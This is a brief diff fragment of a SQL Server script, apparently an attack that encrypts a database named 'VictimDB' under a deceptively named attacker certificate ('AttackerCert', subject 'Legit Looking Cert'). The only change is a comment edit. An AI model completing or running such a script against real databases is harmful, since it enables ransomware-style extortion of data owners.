narbulut

 CREATE CERTIFICATE AttackerCert WITH SUBJECT = 'Legit Looking Cert';

--- Creating Database Encryption Key
+-- Create Database Encryption Key

 USE [VictimDB];